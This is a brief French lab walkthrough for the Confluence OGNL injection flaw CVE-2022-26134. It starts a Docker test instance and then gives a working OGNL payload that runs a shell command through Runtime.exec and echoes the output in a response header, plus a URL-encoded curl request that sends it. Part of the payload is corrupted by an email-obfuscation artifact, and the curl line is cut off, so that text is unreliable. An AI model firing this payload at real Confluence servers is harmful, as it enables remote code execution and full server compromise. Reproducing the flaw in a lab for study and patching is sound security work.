
Vulnérabilité d'exécution de code à distance (RCE) par injection OGNL dans Atlassian Confluence (CVE-2022-26134)
docker-compose up -d
Sur http://localhost:8090, vous verrez Confluence opérationnel.
Ensuite, obtenez une licence d'évaluation pour Confluence et configurez la base de données avec le nom de base de données confluence, l'utilisateur postgres et le mot de passe root.
${(#[email protected]@toString(@java.lang.Runtime@getRuntime().exec("id").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}
curl -v "http://localhost:8090/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%
